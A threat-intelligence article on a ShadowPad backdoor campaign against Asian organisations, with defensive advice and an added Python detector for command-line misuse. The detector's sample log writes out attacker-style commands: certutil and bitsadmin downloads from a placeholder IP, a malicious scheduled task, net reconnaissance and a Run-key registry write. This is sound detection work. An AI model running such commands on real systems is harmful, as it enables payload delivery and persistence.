Threat Watch

Organizations in Asia Targeted with ShadowPad Backdoor

On Monday, Kaspersky's ICS CERT researchers issued a report on Advanced Persistent Threat (APT) activity targeting organizations in Afghanistan, Pakistan, and Malaysia. The initial wave of compromises began in March of 2021 and was discovered by the researchers in October of 2021. The affected companies span the manufacturing, telecommunications, and logistics and transport industries, and the campaign is likely part of an information-gathering mission.

Researchers positively identified CVE-2021-26855, a critical Microsoft Exchange Remote Code Execution (RCE) vulnerability published in early March of 2021, as the initial attack vector for some of the impacted companies. From there, the APT downloaded the ShadowPad backdoor disguised as a legitimate Dynamic-Link Library (DLL), which was then loaded by a legitimate process. In October, the attackers' Tactics, Techniques, and Procedures (TTPs) changed: they began using DLL hijacking to maintain the backdoor. In both instances, the Windows Task Scheduler was used as the launching mechanism.

The Kaspersky researchers report that the attackers ran several commands manually before later automating the process. Other tools were also deployed onto the infected systems, including Cobalt Strike, Mimikatz, and a version of the PlugX backdoor. Based on the TTPs observed and some of the artifacts they uncovered, the research team attributes the attack to an unnamed Chinese APT.

Given the timing of the initial compromise and the vulnerability that was exploited, it is reasonable to assume the attacks took place after Microsoft announced the vulnerability and published a fix: although CVE-2021-26855 had been exploited elsewhere beforehand, this particular string of intrusions most likely occurred once the official patch was available. This highlights the importance of installing security updates covering high-severity vulnerabilities as soon as possible, especially on public-facing servers. Companies should develop and maintain an emergency change management policy that enables rapid testing and deployment of security updates for critical vulnerabilities, particularly those affecting public-facing servers and those being actively exploited.

The backdoor itself used effective evasion techniques to avoid detection, masquerading as a legitimate process loading a legitimate DLL. However, the commands the attackers ran after infiltration are easier to detect and are non-standard in most environments. Companies should implement command-line logging and develop alerts for command-line misuse of programs such as net and reg. Further, companies should establish a baseline of expected scheduled tasks and alert on the creation of new scheduled tasks, which catches this family of evasion and persistence techniques.

Lastly, the tools that the attackers downloaded and installed could be detected in a number of ways. Cobalt Strike, for example, was downloaded via certutil.exe, and the PlugX backdoor was downloaded using bitsadmin. By establishing a baseline of normal use, companies can develop alerts for misuse of these two utilities to fetch malicious payloads. Additionally, companies can use tools like Zeek and Strelka to extract files from network traffic and scan them for malicious content; both can be tuned by file type, so .exe and .dat files can be included.
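To show what the command-line and scheduled-task alerting recommended above looks like in practice, here is an added example (not from the report or from Kaspersky): a small detector run over constructed process-creation records in a made-up `ts=... image=... cmd="..."` format. The baseline task names, the rule patterns and every sample command line are assumptions written for the example.

```python
import re

# Constructed baseline of scheduled task names already expected in this environment (assumption).
BASELINE_TASKS = {"MicrosoftEdgeUpdateTaskMachineCore", "Backup-Nightly"}

# Detection rules: (alert name, image basename, regex over the command line). They cover the
# LOLBin download patterns (certutil, bitsadmin) and noisy net/reg usage the advisory calls out.
RULES = [
    ("certutil_download", "certutil.exe", re.compile(r"-urlcache\b.*\bhttps?://", re.I)),
    ("bitsadmin_download", "bitsadmin.exe", re.compile(r"/transfer\b.*\bhttps?://", re.I)),
    ("net_recon", "net.exe", re.compile(r"\b(user|group|localgroup|view)\b", re.I)),
    ("reg_persistence", "reg.exe", re.compile(r"\badd\b.*\\CurrentVersion\\Run\b", re.I)),
]
# schtasks /create ... /tn <name>: task names without spaces only, to keep the pattern short.
SCHTASKS_CREATE = re.compile(r'/create\b.*?/tn\s+"?([^"\s]+)', re.I)

def parse_line(line):
    """Parse one constructed 'ts=... image=<path> cmd="..."' process-creation record."""
    m = re.match(r'ts=(\S+)\s+image=(\S+)\s+cmd="(.*)"$', line.strip())
    if not m:
        return None
    return {"ts": m.group(1), "image": m.group(2).rsplit("\\", 1)[-1].lower(), "cmd": m.group(3)}

def detect(lines, baseline=BASELINE_TASKS):
    """Return (timestamp, alert) tuples for records matching a rule or creating a non-baseline task."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        for name, image, pattern in RULES:
            if ev["image"] == image and pattern.search(ev["cmd"]):
                alerts.append((ev["ts"], name))
        if ev["image"] == "schtasks.exe":
            m = SCHTASKS_CREATE.search(ev["cmd"])
            if m and m.group(1) not in baseline:
                alerts.append((ev["ts"], "new_scheduled_task:" + m.group(1)))
    return alerts

# Constructed sample records (203.0.113.10 is a documentation-range address, not a real indicator).
SAMPLE_LOG = [
    r'ts=2021-10-05T09:12:03Z image=C:\Windows\System32\certutil.exe cmd="certutil.exe -urlcache -split -f http://203.0.113.10/update.dat C:\ProgramData\update.dat"',
    r'ts=2021-10-05T09:12:40Z image=C:\Windows\System32\schtasks.exe cmd="schtasks /create /sc daily /tn Backup-Nightly /tr C:\Scripts\backup.cmd"',
    r'ts=2021-10-05T09:13:11Z image=C:\Windows\System32\schtasks.exe cmd="schtasks /create /sc onlogon /tn WinUpdateCheck /tr C:\ProgramData\update.dat"',
    r'ts=2021-10-05T09:14:02Z image=C:\Windows\System32\bitsadmin.exe cmd="bitsadmin /transfer job1 /download /priority normal http://203.0.113.10/plug.dat C:\ProgramData\plug.dat"',
    r'ts=2021-10-05T09:15:27Z image=C:\Windows\System32\net.exe cmd="net user administrator /domain"',
    r'ts=2021-10-05T09:16:00Z image=C:\Windows\System32\ping.exe cmd="ping -n 1 fileserver"',
    r'ts=2021-10-05T09:17:45Z image=C:\Windows\System32\reg.exe cmd="reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\ProgramData\update.dat"',
]
```

Calling `detect(SAMPLE_LOG)` flags the certutil and bitsadmin downloads, the non-baseline WinUpdateCheck task, the net reconnaissance and the Run-key write, while the baselined backup task and the ping are left alone; in a real deployment the parser would read Sysmon Event ID 1 or Security 4688 records instead of this constructed format.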